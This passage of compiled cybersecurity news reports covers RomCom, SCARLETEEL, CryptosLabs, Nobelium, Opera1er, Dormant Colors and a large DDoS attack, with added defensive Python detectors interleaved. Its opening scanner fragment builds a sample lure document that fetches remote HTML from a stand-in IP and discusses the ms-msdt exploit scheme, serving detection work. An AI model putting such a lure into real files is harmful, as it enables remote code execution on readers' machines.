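    lure = build_sample_docx("mhtml:http://203.0.113.5/lure.html!x-usc:http://203.0.113.5/lure.html")
    print(scan_document(lure))
    print(scan_document(build_sample_docx()))
    print(scan_document(SAMPLE_RTF))
```

Note that the `.docx` variant contains no `ms-msdt:` string at all; the scheme lives in the HTML fetched from the external target, so a scanner that only greps for `ms-msdt` misses it. The external OLE relationship is the indicator that survives in the document itself.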

BlackBerry has identified the C&C domains and victim IPs used in this campaign. All of these were accessed from a single server that has been observed connecting to known RomCom infrastructure.

"Based on the nature of the upcoming NATO Summit and the related lure documents sent out by the threat actor, the intended victims are representatives of Ukraine, foreign organizations, and individuals supporting Ukraine,” BlackBerry says.

BlackBerry has alerted relevant government agencies of this campaign. RomCom is also known as Void Rabisu and Tropical Scorpius, and is associated with the Cuba ransomware. The group was previously believed to be financially motivated, but recent campaigns have shown a shift in tactics and motivation, suggesting that they are now working for the Russian government.

Since at least October 2022, the RomCom backdoor has been used in attacks targeting Ukraine. These attacks have targeted users of Ukraine's Delta situational awareness program and organizations in Ukraine's energy and water utility sectors.

Outside Ukraine, RomCom attacks have targeted a provincial local government helping Ukrainian refugees, a parliament member of a European country, attendees of the Munich Security Conference and the Masters of Digital conference, and a European defense company.

SCARLETEEL Hackers Target AWS Fargate in Latest Cryptojacking Campaign


An ongoing, sophisticated campaign known as SCARLETEEL continues to target cloud environments, with the threat actors currently focusing on Amazon Web Services (AWS) Fargate.

According to a new report from Sysdig security researcher Alessandro Brucato, "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture."

The cybersecurity firm originally revealed SCARLETEEL in February 2023, describing a complex attack chain that resulted in the theft of confidential information from AWS infrastructure and the installation of cryptocurrency miners to profit from the compromised systems' resources.

Cado Security's follow-up investigation found possible connections to the well-known cryptojacking group TeamTNT, although Sysdig told The Hacker News that it "could be someone copying their methodology and attack patterns."

The threat actor's recent activity continues its pattern of targeting AWS accounts by exploiting weak public-facing web applications in order to gain persistence, steal intellectual property, and potentially earn an estimated $4,000 per day from cryptocurrency miners.

According to Brucato, "The actor discovered and exploited a flaw in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then use it however they wanted."
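Sysdig does not spell out which grant in the policy was at fault, but the failure mode is a familiar one: a policy attached to a low-privilege principal (here, whatever the JupyterLab pod could reach) includes IAM write actions that let the holder attach or create a more permissive policy for itself. The following is an added example, not Sysdig's or the page's code, of a small linter that expands the `Action` patterns in an IAM policy document and reports every grant that is a known self-escalation path. The policy documents are constructed, the list of escalation actions is an assumption drawn from well-known AWS privilege-escalation paths rather than from the report, and the account ID and ARNs are placeholders.

```python
"""Lint an IAM policy document for grants that allow privilege escalation.

Added example; not Sysdig's code. ESCALATION_ACTIONS is an assumption (a common
shortlist of IAM write actions), and the sample policies are constructed.
"""
import fnmatch

# IAM actions with which a principal can widen its own (or another principal's)
# permissions. Assumption: shortlist of well-known escalation paths, not exhaustive.
ESCALATION_ACTIONS = {
    "iam:AttachUserPolicy", "iam:AttachGroupPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutGroupPolicy", "iam:PutRolePolicy",
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:CreateAccessKey", "iam:CreateLoginProfile", "iam:UpdateLoginProfile",
    "iam:UpdateAssumeRolePolicy", "iam:AddUserToGroup", "iam:PassRole",
}

# Constructed: the kind of "convenience" policy that hands out iam:* on everything.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "iam:*"], "Resource": "*"},
    ],
}

# Constructed: same workload, scoped to what it needs; the one remaining IAM grant
# is PassRole on a single role, conditioned on the service it may be passed to.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-data", "arn:aws:s3:::example-data/*"]},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/app-task-role",
         "Condition": {"StringEquals": {"iam:PassedToService": "ecs-tasks.amazonaws.com"}}},
    ],
}


def _as_list(v):
    """IAM allows a string or a list in Action/Resource/Statement; normalise to a list."""
    if v is None:
        return []
    return v if isinstance(v, list) else [v]


def allowed_escalations(policy):
    """Return sorted '<action> on <resource>' strings for each escalation-capable grant.

    Wildcards in Action are expanded against ESCALATION_ACTIONS (IAM matching is
    case-insensitive). Statements carrying a Condition are tagged but still reported,
    because a condition narrows a grant without removing it.
    """
    findings = set()
    for st in _as_list(policy.get("Statement")):
        if st.get("Effect") != "Allow":
            continue
        resources = _as_list(st.get("Resource", "*"))
        tag = " [conditional]" if st.get("Condition") else ""
        if "NotAction" in st:
            # Allow + NotAction grants everything not listed; treat as wide open.
            findings.add(f"NotAction allow grants everything except {_as_list(st['NotAction'])}{tag}")
            continue
        for pattern in _as_list(st.get("Action")):
            for action in ESCALATION_ACTIONS:
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    for r in resources:
                        findings.add(f"{action} on {r}{tag}")
    return sorted(findings)


if __name__ == "__main__":
    print("weak:", allowed_escalations(WEAK_POLICY))
    print("hardened:", allowed_escalations(HARDENED_POLICY))
```

Run against the weak policy the linter lists every IAM write action on `*`, which is exactly the material an attacker with a stolen credential needs to reach `AdministratorAccess`. The hardened policy still reports the `iam:PassRole` grant, deliberately: a scoped, conditioned PassRole is often necessary for ECS or Lambda workloads, and the reviewer should see it and decide, rather than have the tool hide it.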

The adversary begins by exploiting JupyterLab notebook containers deployed in a Kubernetes cluster. From this initial foothold, it conducts reconnaissance on the target network and harvests AWS credentials to gain further access to the victim's environment.

The attackers then install the AWS command-line tool and the Pacu exploitation framework for post-exploitation. The attack is notable for its use of a variety of shell scripts, some of which target AWS Fargate compute instances, to retrieve AWS credentials.

"The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol," Brucato said, adding the SCARLETEEL actors used stealthy techniques to ensure that data exfiltration events are not captured in CloudTrail logs.

Other actions taken by the attacker include deploying a DDoS botnet malware known as Pandora and the Kubernetes penetration testing tool Peirates, all of which point to continued efforts on the actor's part to monetize the compromised hosts.

"The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes," Brucato said. 

"Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but [...] intellectual property is still a priority."

CryptosLabs Scam Ring Preys on French-Speaking Investors, Amasses €480 Million


A group of cybersecurity researchers has uncovered the inner workings of a fraudulent organization known as CryptosLabs. This scam ring has allegedly generated illegal profits amounting to €480 million by specifically targeting individuals who speak French in France, Belgium, and Luxembourg since April 2018.

According to a comprehensive report by Group-IB, the scam ring's modus operandi revolves around elaborate investment schemes. They impersonate 40 prominent banks, financial technology companies, asset management firms, and cryptocurrency platforms. The scam infrastructure they have established includes over 350 domains hosted on more than 80 servers.

Group-IB, headquartered in Singapore, describes CryptosLabs as an organized criminal network with a hierarchical structure. The group comprises kingpins, sales agents, developers, and call center operators. These individuals are recruited to lure potential victims by promising high returns on their investments.

"CryptosLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, social media ads, documents, and investment platforms in the French language," Anton Ushakov, deputy head of Group-IB's high-tech crime investigation department in Amsterdam, stated.

"They even impersonated French-dominant businesses to resonate with their target audience better and be successful in exploiting them."

The scam begins by enticing targets through advertisements on social media, search engines, and online investment forums. The scammers masquerade as the "investment division" of the impersonated organization and present attractive investment plans, aiming to obtain the victims' contact details.

Once engaged, the victims are contacted by call center operators who provide them with additional information about the fraudulent platform and the credentials needed for trading. After logging into the platform, victims are encouraged to deposit funds into a virtual balance. They are then shown fabricated performance charts, enticing them to invest more in pursuit of greater profits. However, victims eventually realize they cannot withdraw any funds, even if they pay the requested "release fees."

"After logging in, the victims deposit funds on a virtual balance," Ushakov said. "They are then shown fictitious performance charts that trigger them to invest more for better profits until they realize they cannot withdraw any funds even when paying the 'release fees.'"

Initially, the victims are required to deposit around €200-300. However, the scam is designed to manipulate victims into depositing larger sums by presenting them with false evidence of successful investments.

Group-IB initially uncovered this large-scale scam-as-a-service operation in December 2022. Their investigation traced the group's activities back to 2015 when they were experimenting with various landing pages. CryptosLabs' involvement in investment scams became more prominent in June 2018 after a preparatory period of two months.

A key aspect of the fraudulent campaign is the utilization of a customized scam kit. This kit enables the threat actors to execute, manage, and expand their activities across different stages of the scam, ranging from deceptive social media advertisements to website templates used to facilitate the fraud.

The scam kit also includes auxiliary tools for creating landing pages, a customer relationship management (CRM) service that allows the addition of new managers to each domain, a leads control panel used by scammers to onboard new customers to the trading platform, and a real-time VoIP utility for communicating with victims.

"Analyzing CryptosLabs, it is evident that the threat group has given its activities a well-established structure in terms of operations and headcount, and is likely to expand the scope and scale of its illicit business in the coming years," Ushakov said.

Hackers are Employing This Top Remote Access Tool to Get Unauthorised Access to Your Company's Networks

Another genuine enterprise software platform is being misused by cybercriminals to deliver malware and ransomware to unwitting victims. The DFIR Report's cybersecurity analysts identified many threat actors using Action1 RMM, an otherwise benign remote desktop monitoring and management tool. Action1, like any other remote management tool, is used by managed service providers (MSPs) and other IT teams to manage endpoints in a network from a remote location. It can be used to handle software patches, software installation, troubleshooting, and other related tasks.

According to a BleepingComputer report, fraudsters favour this software in particular because of the range of functionality its free edition provides. The free plan's only restriction is a limit of 100 managed endpoints, which makes it an appealing tool for criminals.

Several unnamed groups have been found using Action1 in their attacks, but one in particular stands out: Monti. This gang was discovered last summer by the BlackBerry Incident Response Team, and it was later found that Monti shares many characteristics with the infamous Conti syndicate.

Conti's attacks were typically launched via AnyDesk or Atera rather than Action1. The attackers were also seen utilizing Zoho's ManageEngine Desktop Central. In either instance, the attackers would employ remote monitoring and management tools to install various types of malware, including ransomware, on target endpoints. 

At times, the attackers would send an email imitating a prominent brand, asking the victim to call immediately to stop a significant transaction or to obtain a large refund. On the call they would instruct the victim to install RMM software, which they would then use to infect the target systems. Action1 is aware that its software is being abused for malicious purposes and says it is working to help.

“Last year we rolled-out a threat actor filtering system that scans user activity for suspicious patterns of behavior, automatically suspends potentially malicious accounts, and alerts Action1’s dedicated security team to investigate the issue,” Mike Walters, VP of Vulnerability and Threat Research and co-founder of Action1 Corporation, told BleepingComputer.

Russian APT Hackers Increasingly Attacking NATO Allies in Europe

According to the Polish CERT and the Military Counterintelligence Service, an ongoing cyberespionage effort linked to a Russian nation-state entity is targeting European government agencies and diplomats in order to collect Western government intelligence on the Ukraine war. According to a Thursday advisory from the two agencies, a campaign linked to the Russian APT organization Nobelium is targeting government agencies and diplomats involved with NATO and the European Union, as well as African states to a lesser extent. Per the Polish authorities, the hackers are targeting victims with spear-phishing emails that appear to come from European embassies, inviting them to a meeting or event at one of the embassies.

The emails comprise malicious documents masquerading as calendar invites or meeting agendas. When victims open these files, they are sent to a hijacked website hosting a trademark Nobelium malware dropper dubbed EnvyScout, which sends malicious .img or .iso files to the victim's machine.

Nobelium previously concealed its malware in .zip or .iso files, but in the latest operation the hackers additionally use .img files, which do not carry the Mark of the Web, the flag Windows attaches to downloaded files so that they are treated as untrusted and trigger a warning before they run. The malware therefore launches without any prompt to the user.

Once executed, the malware loads additional tools previously connected with Nobelium, such as the command-and-control tool SnowyAmber and the malware downloader QuarterRig, which then exfiltrate the victim's IP address and other system information.

According to the Polish CERT, the hackers analyse this information to identify worthwhile targets and to check whether the victim has antivirus or other malware-detection tools enabled.

The Polish CERT stated that, in addition to European government institutions and personnel, European nongovernmental organisations are also at risk from a Nobelium intrusion. To defend against it, the agency recommends restricting the ability to mount disk image files and enabling software restriction controls so that unexpected files cannot execute.
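One way to turn the advisory's concern about mounted .img/.iso files into a detection rule, as an added example that is not part of the Polish CERT advisory or of any vendor's product: the script below correlates disk-image mounts with process launches from the mounted drive letter within a short window. The event format, host names, file paths and timestamps are constructed for illustration; a real deployment would map them from whatever endpoint telemetry you actually collect.

```python
"""Detect execution from a freshly mounted disk image (.iso/.img).

Added example. The event format below is constructed and is not any product's
native log schema. It models two event kinds that most endpoint telemetry can
supply: a disk-image mount that assigns a drive letter, and a process creation
carrying the image path of the new process.
"""
from collections import namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts kind host data")

# Constructed sample telemetry (not real logs). Line format:
#   timestamp|kind|host|key=value;key=value
SAMPLE_EVENTS = """\
2023-04-13T09:01:02|mount|WS-14|image=C:\\Users\\a.nowak\\Downloads\\invite.img;drive=E:
2023-04-13T09:01:09|process|WS-14|image=E:\\Schedule.exe;parent=C:\\Windows\\explorer.exe
2023-04-13T09:30:00|process|WS-14|image=C:\\Program Files\\Zoom\\Zoom.exe;parent=C:\\Windows\\explorer.exe
2023-04-13T10:15:44|mount|WS-07|image=D:\\iso\\win10-install.iso;drive=F:
2023-04-13T11:40:00|process|WS-07|image=F:\\setup.exe;parent=C:\\Windows\\explorer.exe
"""

WINDOW = timedelta(minutes=10)      # how soon after a mount an execution is suspicious
IMAGE_EXTENSIONS = (".iso", ".img")  # disk-image types the advisory is concerned with


def parse_events(text):
    """Parse the constructed pipe-delimited format into Event tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, host, payload = line.split("|", 3)
        data = dict(item.split("=", 1) for item in payload.split(";"))
        events.append(Event(datetime.fromisoformat(ts), kind, host, data))
    return events


def find_image_executions(events, window=WINDOW):
    """Return (host, mounted_image, executed_binary) for every process whose
    image path lies on a drive letter that a .iso/.img mount assigned on the
    same host within `window` beforehand."""
    active = {}  # (host, drive letter) -> (mount time, image file path)
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "mount" and ev.data["image"].lower().endswith(IMAGE_EXTENSIONS):
            active[(ev.host, ev.data["drive"].upper())] = (ev.ts, ev.data["image"])
        elif ev.kind == "process":
            drive = ev.data["image"][:2].upper()
            mount = active.get((ev.host, drive))
            if mount and ev.ts - mount[0] <= window:
                hits.append((ev.host, mount[1], ev.data["image"]))
    return hits


if __name__ == "__main__":
    for host, image, binary in find_image_executions(parse_events(SAMPLE_EVENTS)):
        print(f"{host}: {binary} launched from image {image}")
```

In the constructed sample, only WS-14 is reported: a binary ran from E: seven seconds after an .img from the Downloads folder was mounted there, whereas the installer ISO on WS-07 was mounted over an hour before anything ran from it. The window and the mount-source path (Downloads or a mail attachment folder versus a software repository) are the two knobs to tune; an administrator running setup.exe from a freshly mounted installer image will otherwise trip the rule.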

According to a recent BlackBerry Research and Intelligence report, the campaign has been active since early March and targets victims with outdated network equipment. BlackBerry believes the effort was likely begun by Russian hackers during the February visit of Polish Ambassador Marek Magierowski to the United States.

"We believe the target of Nobelium's campaign is Western countries, especially those in Western Europe, which provide help to Ukraine," BlackBerry researchers wrote.

Nobelium, also known as APT29 and CozyBear, is one of a few Russian cyber-operations groups working against Ukraine and its allies. Researchers suspect the group was also responsible for the SolarWinds supply chain hack, which was detected in December 2020.



The Cybercrime Ecosystem Knits a Profitable Underground Gig Economy

Over a 30-month period, cybercriminal groups and threat groups advertised for workers with expertise in software development, IT infrastructure maintenance, and designing fraudulent websites and email campaigns. According to a new report from cybersecurity firm Kaspersky, demand for technically skilled individuals continues, but it spiked during the coronavirus pandemic, with double the average number of job advertisements appearing in March 2020, the first month of the pandemic.

The analysis gathered messages from 155 Dark Web forums between January 2020 and June 2022, focusing on those that mentioned employment — either by cybercriminal groups or individuals looking for work. The majority of job postings (83%) were from threat groups looking for highly skilled workers, such as developers (61%), attack specialists (16%), and fraudulent website designers (10%).

As per Polina Bochkareva, a security services analyst at Kaspersky, enhancing defenses has compelled attackers to optimize their tools and techniques, driving the need for more technical experts.

"Business related to illegal activities is growing on underground markets, and technologies are developing along with it," she says. "All this leads to the fact that attacks are also developing, which requires more skilled workers."

The data on underground jobs reveals a spike in activity in cybercriminal services as well as the professionalization of the cybercrime ecosystem. According to a December report, ransomware groups have become much more efficient as they have turned specific aspects of operations into services, such as offering ransomware-as-a-service (RaaS), running bug bounties, and forming sales teams.

Furthermore, initial access brokers have productized the opportunistic compromise of enterprise networks and systems, frequently selling that access to third parties. According to the Kaspersky report, such a segment of labor necessitates the use of technically skilled individuals to develop and support complex features.

"The ads we analyzed also suggest that a substantial number of people are willing to engage in illicit or semilegal activities despite the accompanying risks," the report stated. "In particular, many turn to the shadow market for extra income in a crisis."

Pandemic caused spike 

A similar crisis sparked a surge in activity on Dark Web forums in early 2020. The pandemic, with its sudden layoffs and work-from-home mandates, fueled significant activity in the cybercrime underground, with 2020 seeing the highest number of employment-related posts. Overall, 41% of advertisements and job-seeking inquiries were posted on the Dark Web during the year, which is about average. However, March 2020 was the first month of worldwide lockdowns and saw approximately 6% of all postings, roughly double the average rate.

"Some ... living in the region suffered from the reduction of income, took a mandatory furlough, or lost their jobs altogether, which subsequently resulted in rising unemployment levels," Kaspersky stated in the report. "Some job seekers lost all hope to find steady, legitimate employment and began to search on Dark Web forums, spawning a surge of resumes there. As a result, we observed the highest ad numbers, both from prospective employers and job seekers."

Personal crises appear to have driven some technically inclined workers to seek employment with cybercriminal organizations. A common refrain in job advertisements is that applicants should not be addicted to drugs or alcohol.

"Teamwork skills, stable connection, no alcohol or drug addictions," read one job posting's translated requirements in the Kaspersky report.

"Dirty Work"

In many cases, the terms of the Dark Web jobs were similar to those of legitimate jobs, such as full-time employment, paid time off, and regular pay increases, with salaries ranging from $1,300 to $4,000 per month. However, the majority did not have an employment contract, and only 10% included a promise to pay salaries on time. The underground employment opportunities were dubbed "dirty jobs" in the report.

"Many are drawn by expectations of easy money and large financial gain," the report stated. "Most times, this is only an illusion. Salaries offered on the Dark Web are seldom significantly higher than those you can earn legally."

Reverse engineers had the highest potential median salary of $4,000 per month, with attack specialists and developers coming in second and third with promises of $2,500 and $2,000, respectively. However, the majority of offers (61%) were geared toward developers. According to Kaspersky's Bochkareva, these workers are the key to the cybercriminal underground.

"The most sought-after professionals were developers and attack specialists, particularly for coding malicious programs, phishing websites, and planning and implementing attacks," she says.

Report: Tax Preparation Software Returned Personal Consumer Data to Meta and Google

According to The Markup, popular tax preparation software such as TaxAct, TaxSlayer, and H&R Block sent sensitive financial information to Facebook's parent company Meta via Meta's widely used tracking code, known as a pixel, which lets site operators track user activity on their sites.

According to a report published on Tuesday by The Verge, Meta pixel trackers in the software sent information such as names, email addresses, income figures, and refund amounts to Meta, in violation of Meta's own policies. The Markup also discovered that TaxAct sent similar financial data to Google via its analytics tool, though that data did not include names.

According to CNBC, the Meta pixel is a small piece of code that publishers and businesses embed on their websites. When you visit such a site, the pixel sends a message about the visit back to Facebook. It also enables businesses to target advertisements at people based on the websites they have previously visited.

Based on the report, Facebook could use data from tax websites to power its advertising algorithms even if the person using the tax service does not have a Facebook account. It's yet another example of how Facebook's tools can be utilized to track people across the internet, even if users are unaware of it. According to some statements provided to The Markup, it could have been a mistake.

Ramsey Solutions, a financial advice and software company that uses TaxSlayer, told The Markup that it "did NOT KNOW and was never alerted that personal tax information was being gathered by Facebook from the Pixel," and that the company informed TaxSlayer to deactivate the Pixel tracking from SmartTax.

An H&R Block spokesperson said the company takes “protecting our clients’ privacy very seriously, and we are taking steps to mitigate the sharing of client information via pixels.” 

H&R Block further stated in a statement on Wednesday that it had "removed the pixels from its DIY online product to stop any client tax information from being collected."

The Markup discovered the data trail earlier this year while working with Mozilla Rally on a project called "Pixel Hunt," in which participants installed a browser extension that sent the group a copy of data shared with Meta via its pixel.
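The Pixel Hunt approach described above, reduced to its core, as an added example that is not The Markup's or Mozilla's code: once a browser extension or proxy has captured the request URLs a page sends to a tracker, the audit is a matter of decoding each query string and flagging parameters whose names or values look like financial or identity data. The tracker host name, parameter names and request URLs below are constructed for illustration and are not taken from Meta's pixel documentation or from the report.

```python
"""Audit captured tracking-pixel requests for sensitive fields.

Added example in the spirit of the Pixel Hunt study. Given request URLs
captured on the way to a tracker, report which requests carry fields that
look like financial or identity data. Host name, parameter names and values
are constructed for illustration.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample captures (not real traffic).
CAPTURED_REQUESTS = [
    "https://tracker.example/tr?id=123&ev=PageView&dl=https%3A%2F%2Ftax.example%2Fstart",
    "https://tracker.example/tr?id=123&ev=ViewContent&cd[income]=83400&cd[refund_amount]=1250&cd[filing_status]=married",
    "https://tracker.example/tr?id=123&ev=Lead&cd[email]=jane.doe%40example.com&cd[first_name]=Jane",
    "https://tracker.example/tr?id=123&ev=PageView&dl=https%3A%2F%2Ftax.example%2Fhelp",
]

# Parameter names (after stripping a wrapper such as cd[...]) that indicate
# sensitive data. Extend this with your own site's field names.
SENSITIVE_KEYS = re.compile(
    r"(income|refund|wage|salary|loan|debt|ssn|tax|filing|email|first_name|last_name|phone|dob)",
    re.IGNORECASE,
)
# A value shaped like an e-mail address is sensitive whatever the key is called.
EMAIL_VALUE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def bare_key(key):
    """Reduce 'cd[income]' to 'income'; leave plain keys unchanged."""
    m = re.match(r"^\w+\[(.+)\]$", key)
    return m.group(1) if m else key


def audit_request(url):
    """Return the (key, value) pairs in `url` that look sensitive, matched on
    the parameter name or on a value shaped like an e-mail address."""
    flagged = []
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        name = bare_key(key)
        if SENSITIVE_KEYS.search(name) or EMAIL_VALUE.match(value):
            flagged.append((name, value))
    return flagged


def audit_capture(urls):
    """Map each tracker event name to the sensitive fields it carried;
    requests with nothing sensitive are omitted."""
    report = {}
    for url in urls:
        flagged = audit_request(url)
        if flagged:
            event = dict(parse_qsl(urlsplit(url).query)).get("ev", "?")
            report.setdefault(event, []).extend(flagged)
    return report


if __name__ == "__main__":
    for event, fields in audit_capture(CAPTURED_REQUESTS).items():
        print(event, fields)
```

The plain page-view beacons pass, while the two requests that carry custom data are reported with the exact fields leaked. The same check can run as a pre-deployment test against your own site: drive it through a headless browser, capture outgoing tracker requests, and fail the build if `audit_capture` returns anything.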

“Advertisers should not send sensitive information about people through our Business Tools,” a Meta spokesperson told CNBC in a statement. “Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

Meta considers potentially sensitive data to contain information about income, loan amounts, and debt status.

“Any data in Google Analytics is obfuscated, meaning it is not tied back to an individual and our policies prohibit customers from sending us data that could be used to identify a user,” a Google spokesperson told CNBC. “Additionally, Google has strict policies against advertising to people based on sensitive information.”

A TaxAct spokesperson said in a statement, “The privacy of our customers is very important to all of us at TaxAct, and we continue to comply with all laws and IRS regulations. Data provided to Facebook is used at an aggregate level, not the individual level, by TaxAct to analyze our advertising effectiveness. TaxAct is not using the information provided by its customers and referenced in the report issued by The Markup to target advertising with Facebook.”

A TaxSlayer representative did not immediately respond to CNBC's request for comment.

French Cybercriminals Opera1er Stole up to $30m from Banks

Based on a new report published by cybersecurity firm Group-IB, a French-speaking cybercrime group may have stolen more than $30 million from banks and other types of organizations in recent years. 

Group-IB has identified the threat actor as Opera1er. Others have previously investigated some of its activities, naming it Common Raven, Desktop-Group, and NXSMS. The cybersecurity firm is aware of 30 successful attacks carried out between 2019 and 2021, with many of the victims being attacked multiple times. 

The majority of the attacks targeted African banks, but victims also included financial services, mobile banking services, and telecommunications companies. Victims were discovered in 15 countries across Africa, Latin America, and Asia.

Group-IB has confirmed that $11 million has been stolen from victims since 2019, but believes the cybercriminals may have taken more than $30 million. The typical Opera1er attack begins with a spear-phishing email sent to a small number of people within the targeted organisation. The goal is access to domain controllers and banking back-office systems.

The hackers waited 3-12 months after gaining access to an organization's systems before stealing money. The cybercriminals used the banking infrastructure in the final phase of the operation to transfer money from bank customers to mule accounts, from which it was withdrawn at ATMs by money mules, typically on weekends and public holidays.

“In at least two banks, Opera1er got access to the SWIFT messaging interface,” Group-IB explained. “In one incident, the hackers obtained access to an SMS server which could be used to bypass anti-fraud or to cash out money via payment systems or mobile banking systems. In another incident, Opera1er used an antivirus update server which was deployed in the infrastructure as a pivoting point.”

Opera1er does not appear to use any zero-day vulnerabilities or custom malware. The group has exploited old software flaws as well as widely available malware and tools. According to Group-IB's analysis, the majority of the attackers' emails were written in French, and their English and Russian are "quite poor."

Chrome Extensions with 1M+ Installs Hijack Targets’ Browsers

Guardio Labs researchers have discovered Dormant Colors, a new malvertising campaign to deliver malicious Google Chrome extensions. 

The extensions are used to hijack searches and insert affiliate links into web pages. The campaign was dubbed Dormant Colors by the researchers because the extensions offer color customization.

“It starts with the trickery malvertising campaign, continues with a crafty novel way to side-load the real malicious code without anyone noticing (until now!), and finally with stealing not only your searches and browsing data, but also affiliation to 10,000 targeted sites — a capability that is easily leveraged for targeted spear phishing, account takeover and credential extraction — all using this powerful network of millions of infected computers worldwide!” reads the post published by the Guardio Labs. 

The researchers had discovered at least 30 variants of these extensions in both the Chrome and Edge web stores by mid-October 2022, and over a million people had installed them. The experts found that the extensions' code contains no malicious components in its initial state; the malicious snippets are added later. The attack chain starts with malvertising messages designed to trick victims into clicking an install button, as seen in the video. After clicking the 'OK' or 'Continue' button, victims are prompted to install a color-changing extension.

Once installed, these extensions redirect users to various pages that side-load malicious scripts that alter browser behavior. The extensions can hijack searches and return affiliate links in the results. This scheme enables threat actors to profit from traffic to these websites while also stealing data.

According to experts, these malicious extensions are more than just other search hijackers because they include "stealth modules for code updating and telemetry collection, as well as a backbone of servers harvesting data from millions of users." The collected data is used to categorize potential targets and select the best social engineering attack vectors to target and steal from them.

Dormant Colors' operations rely on affiliation with 10,000 targeted sites and a global network of millions of infected computers. The attackers add affiliate tags to the URL, and any purchases made on the site result in a commission for the operators. The researchers released a video that depicts affiliate hijacking for the shopping site 365games.co.uk. The video depicts the address bar being filled with data from affiliation sources. The same method can clearly be used to redirect victims to phishing pages in order to steal credentials for popular services such as Microsoft 365, online banking, and social media platforms.

“This campaign is still up and running, shifting domains, generating new extensions, and re-inventing more color and style-changing functions you can for sure manage without. Adding to that, the code injection technique analyzed here is a vast infrastructure for mitigation and evasion and allows leveraging the campaign to even more malicious activities in the future.” concludes the report that also includes Indicators of Compromise (IoCs) for this campaign. 

“At the end of the day, it’s not only affiliation fees being collected on your back, this is your privacy as well as your internet experience being compromised here, in ways that can target organizations by harvesting credentials and hijacking accounts and financial data. No extension that makes a fine-looking website look dark and ugly is worth it…”

Extended DDoS Attack With 25.3B+ Requests Thwarted

On June 27, 2022, the cybersecurity firm Imperva mitigated a DDoS attack with over 25.3 billion requests. The attack, according to experts, sets a new record for Imperva's application DDoS mitigation solution. The attack, which targeted an unnamed Chinese telecommunications company, was notable for its duration, lasting more than four hours and peaking at 3.9 million RPS. 

“On June 27, 2022, Imperva mitigated a single attack with over 25.3 billion requests, setting a new record for Imperva’s application DDoS mitigation solution” reads the announcement. “While attacks with over one million requests per second (RPS) aren’t new, we’ve previously only seen them last for several seconds to a few minutes. On June 27, Imperva successfully mitigated a strong attack that lasted more than four hours and peaked at 3.9 million RPS.”

The Chinese telecommunications company had previously been targeted by large attacks, and the experts added that two days later a new, shorter DDoS attack hit its website. The record-breaking attack had an average rate of 1.8 million RPS. To send many requests over each individual connection, the threat actors used HTTP/2 multiplexing, which carries multiple concurrent request streams over a single connection.

The attackers' technique is difficult to detect and can bring down targets while using relatively few resources.
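Why a multiplexed flood slips past connection-based limits, shown in code as an added example that is not Imperva's: with HTTP/2, one TCP connection can carry hundreds of concurrent request streams, so a client that opens only two connections, well under any per-IP connection cap, can still deliver hundreds of requests per second. Counting requests per connection per second is what exposes it. The client addresses (RFC 5737 documentation ranges), request counts and log shape below are constructed for illustration.

```python
"""Per-connection request-rate detection for multiplexed (HTTP/2) floods.

Added example, not Imperva's mitigation code. It contrasts two views of the
same synthetic access log: connections per client address, which looks normal
for the flooder, and requests per connection per second, which does not.
"""
from collections import defaultdict


def constructed_requests():
    """Build a synthetic request log of (client_ip, connection_id, timestamp)
    with one normal client and one client flooding over few connections."""
    reqs = []
    # Normal browsing: 3 connections, 2 requests per second each, for 5 seconds.
    for conn in range(3):
        for sec in range(5):
            for k in range(2):
                reqs.append(("198.51.100.7", f"n{conn}", sec + k * 0.4))
    # Flood: only 2 connections, but 400 multiplexed requests per second on each.
    for conn in range(2):
        for sec in range(5):
            for k in range(400):
                reqs.append(("203.0.113.9", f"f{conn}", sec + k / 400))
    return reqs


def connections_per_ip(reqs):
    """The view a per-IP connection limit sees: distinct connections per client."""
    conns = defaultdict(set)
    for ip, conn, _ in reqs:
        conns[ip].add(conn)
    return {ip: len(c) for ip, c in conns.items()}


def flag_connections(reqs, max_rps_per_conn=100):
    """Return {(ip, conn): peak requests/second} for every connection whose
    request rate in any one-second bucket exceeds `max_rps_per_conn`."""
    per_sec = defaultdict(int)
    for ip, conn, ts in reqs:
        per_sec[(ip, conn, int(ts))] += 1
    peak = defaultdict(int)
    for (ip, conn, _), n in per_sec.items():
        peak[(ip, conn)] = max(peak[(ip, conn)], n)
    return {k: v for k, v in peak.items() if v > max_rps_per_conn}


if __name__ == "__main__":
    log = constructed_requests()
    print("connections per IP:", connections_per_ip(log))
    print("connections over the per-connection rate limit:", flag_connections(log))
```

On the synthetic log the flooder holds fewer connections than the normal client, so a connections-per-IP rule never fires, while the per-connection rate view reports both flood connections at 400 requests per second. In production the same bucketing is applied to the connection identifier your proxy or load balancer logs, and the threshold is set from the per-connection rates real browsers produce against your own site.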

“Since our automated mitigation solution is guaranteed to block DDoS in under three seconds, we estimate that the attack could have reached a much greater rate than our tracked peak of 3.9 million RPS.” continues Imperva.

This attack was launched by a botnet comprised of nearly 170,000 different IP addresses, including routers, security cameras, and compromised servers. The compromised devices can be found in over 180 countries, with the majority of them in the United States, Indonesia, and Brazil.

